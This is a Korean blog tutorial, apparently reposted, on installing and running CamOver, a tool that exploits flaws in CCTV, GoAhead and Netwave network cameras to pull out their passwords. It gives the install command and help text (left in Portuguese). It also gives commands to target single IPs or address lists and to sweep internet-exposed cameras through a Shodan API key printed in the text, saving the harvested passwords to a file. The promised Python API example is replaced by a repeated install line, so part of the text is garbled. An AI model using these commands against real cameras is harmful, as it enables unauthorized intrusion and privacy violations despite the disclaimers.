오늘은 흥미로운 도구인 CamOver에 대해 이야기하겠습니다. 이 도구는 네트워크 카메라의 취약점을 악용하여 비밀번호를 알아내고 다양한 유형의 공격을 수행하는 데 사용됩니다. 공격은 CCTV, GoAhead, Netwave 등 인기 카메라 모델의 취약점을 악용하여 발생합니다. 아래에서는 CamOver의 설치 및 사용법을 자세히 설명하겠습니다.
CamOver로 네트워크 카메라 해킹
이 문서는 교육 목적과 윤리적 해킹 학습을 위한 것입니다. 네트워크 카메라에 대한 무단 액세스는 불법이며 범죄로 간주됩니다. 웹사이트 spy-soft.net이나 작성자는 귀하의 행동에 대해 책임을 지지 않습니다.
도구를 설치하려면 다음 명령을 사용하세요.
pip3 install git+https://github.com/EntySec/CamOver
설치 후 다음 명령을 사용하여 CamOver를 시작하세요.
camover
-h, --help Exibe a mensagem de ajuda e sai. -t, --threads Usa multithreading para acelerar o processo. -o OUTPUT, --output OUTPUT Salva os resultados em um arquivo. -i INPUT, --input INPUT Arquivo com endereços das câmeras. -a ADDRESS, --address ADDRESS Um único endereço de câmera. --shodan SHODAN Chave de API do Shodan para explorar câmeras pela internet. --zoomeye ZOOMEYE Chave de API do ZoomEye para explorar câmeras pela internet. -p PAGES, --pages PAGES Número de páginas a ser buscado no ZoomEye.
IP 주소가 192.168.99.100인 카메라가 있다고 가정해 보겠습니다. 악용 가능 여부를 확인하려면 다음 명령을 실행하세요.
camover -a 192.168.99.100
Shodan을 사용하여 온라인에서 카메라를 찾으려면 다음을 실행하세요.
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
Shodan API 키(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)가 예시로 제공됩니다. 이 키를 사용하거나 자신의 키를 사용할 수 있습니다.
cameras.txt라는 파일에 카메라 주소 목록이 있는 경우 이를 탐색하고 얻은 비밀번호를 비밀번호.txt에 저장할 수 있습니다.
camover -t -i cameras.txt -o passwords.txt
CamOver는 도구를 코드에 통합할 수 있는 Python API도 제공합니다. 아래 예는 CamOver 객체를 생성하고, IP로 카메라를 탐색하고, 획득한 자격 증명을 표시하는 방법을 보여줍니다.
pip3 install git+https://github.com/EntySec/CamOver
CamOver는 네트워크 카메라의 취약점을 악용하는 강력한 도구입니다. 이 주제에 관심이 있다면 네트워크 보안 및 침투 테스트에 대해 배울 수 있는 귀중한 리소스가 될 수 있습니다.
⚠️ 면책조항: 승인되지 않은 활동에 CamOver와 같은 도구를 사용하는 것은 범죄이며 심각한 처벌을 받을 수 있습니다. 이 정보는 법적, 윤리적 목적으로만 사용하십시오.
위 내용은 CamOver — 네트워크 카메라의 취약점을 악용하는 도구의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!